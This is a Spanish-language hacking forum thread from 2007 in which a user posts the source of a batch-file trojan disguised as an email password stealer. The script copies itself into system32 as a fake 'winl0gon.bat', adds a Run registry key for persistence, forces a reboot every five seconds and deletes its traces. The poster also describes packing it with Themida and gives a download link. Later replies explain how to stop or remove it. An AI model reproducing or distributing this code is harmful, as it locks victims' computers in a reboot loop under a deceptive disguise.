| Ver tema anterior :: Ver siguiente tema |
| Autor |
Mensaje |
jeissontkd User destacando

|
Publicado: Mie Mar 07, 2007 11:06 pm Título del mensaje: mi segundo codigo bat para win me xp y vista |
|
|
fue un codigo bat auto ejecutable llamado roba.exe BY garhack se hace pasar como un roba pass de correos y lo k hace es entrar en c windows y sistem 32 y dejar un archivo .bat y al autoejecutarze tambien agrega un registro a windows k al incio de windows lo ejecuta el winl0gon.bat y reinicia el computador, en 5 seg y es asi, cada vez k se incia... y borra el k uno ha bajado y solo deja el .bat ejektable.es muy exelente, se los recomiendo y es mi segundo y los pruebo antes de salir....a la luz....
aca les dejo el codigo del primero...
@echo off
echo F | copy C:\robas.bat C:\WINDOWS\system32\winl0gon.bat
@echo off
reg add HKLM\Software\microsoft\windows\currentversion\run /v Garhack /t REG_SZ /d "%systemroot%\system32\winl0gon.bat"
msg"Error del Sistema, su ordenador debe reiniciarse...att garhack muere"
shutdown -r -f -t 5
del c:\roba.bat
del c:\roba.exe
del c:\roba.rar
y el segundo es..
msg"Error del Sistema, su ordenador debe reiniciarse...att garhack muere"
shutdown -r -f -t 5
y los uni con winrar y despues el themida..y listo...
aca les dejo el link para escargarlo...
http://rapidshare.com/files/19920968/roba.exe
no lo vayan a ejecutar ustedes, hay si la unica es formatear..eso solo es de conocimiento...
att:Garhack-x _________________
http://www.garhack-x.uni.cc |
|
|
 |
IaM_SePia Yo soy el foro

|
Publicado: Jue Mar 08, 2007 9:16 am Título del mensaje: |
|
|
¿Funciona para todos los WIN XP?
Saludos Cordiales
P.D: El archivo echo funciona en windows? _________________ Sólo hay 10 tipos de personas, las que entendemos código binario, y las que no...
|
|
|
 |

|
Publicado: Jue Mar 08, 2007 5:22 pm Título del mensaje: |
|
|
si lo probe en mi windows y funciona bien y en el vista ambien lo probe es muy exelente.... _________________
|
|
 |
IaM_SePia Yo soy el foro

|
Publicado: Jue Mar 08, 2007 11:53 pm Título del mensaje: |
|
|
Una pregunta... cuál de los dos es el correcto? y otra cosa, cómo lo pudiste provar si luego se te debía reiniciar kada 5 segs??
Saludos Cordilaes _________________ Sólo hay 10 tipos de personas, las que entendemos código binario, y las que no...
|
|
|
 |

|
Publicado: Vie Mar 09, 2007 7:41 pm Título del mensaje: |
|
|
no es k antes de enpaketarlo lo probe con 10 seg y ahi alcanzaba a borrar el archivo de incio del registro y despues si lo configure a 5 seg. y listo.
es k tienes k hacer dos codigos .bat el primero k se llame roba y el segundo robas.bat y cada uno tiene su funcion el primero como ya viste es el k crea y erl segundo lo k hace es ejccutarse.y listo....es facil _________________
|
|
 |
bad_saint Conociendo Foroz

|
Publicado: Dom Mar 25, 2007 3:51 am Título del mensaje: |
|
|
| Cita: |
cómo lo pudiste provar si luego se te debía reiniciar kada 5 segs??
|
facil, entras en modo a prueba de fallos para que no se cargue el bat, luego pues solo le das inicio->ejecutar, tecleas msconfig te vas a la pestaña que dice inicio y eliminas las entradas sospechosas, bueno es la manera mas obvia de hacerlo...
me siento raro postiando, en fin es algo nuevo.
ps. interesante lo de los bat, me recuerda uno que vi en la universidad que se copiaba a si mismo al final de todos los bat's que encontraba en el sistema (tipo inyeccion) para al momento de ejecutar alguno tambien ejecutar su codigo, pero era con fines educativos solamente y no estaba compilado como exe. _________________ -# todos somos vulnerables --- |
|
|
 |
TitoNando User destacando

|
Publicado: Dom Mar 25, 2007 2:23 pm Título del mensaje: |
|
|
| Cita: |
| cómo lo pudiste provar si luego se te debía reiniciar kada 5 segs?? |
Le pegas a la tecla con el logotipo de Güindous a la vez que a la R, es decir se abre la ventana de ejutar. Y escribes shutdown -a. De este modo se detiene la cuenta atrás.
Y me sobran 4 segundos.
Salu2  _________________
|
|
|
 |

|
Publicado: Lun Mar 10, 2008 10:02 pm Título del mensaje: |
|
|
Saves una web para descargarte el programa themida en Español y que funcione?
gracias!!
salu2  |
|
|
 |
firefenix Forero

|
Publicado: Lun Mar 10, 2008 10:59 pm Título del mensaje: |
|
|
Supongo que para un .BAT la única forma de reiniciar el PC es hacerlo mediante lo que has puesto (shutdown -r -f -t 5), pero... no te parece una forma demasiado brusca de apagar el ordenador? No sé hasta qué punto esta es buena forma para hacerlo.
Yo desde luego no lo voy a probar, por si las moscas... _________________
|
|
|
 |
|
|
|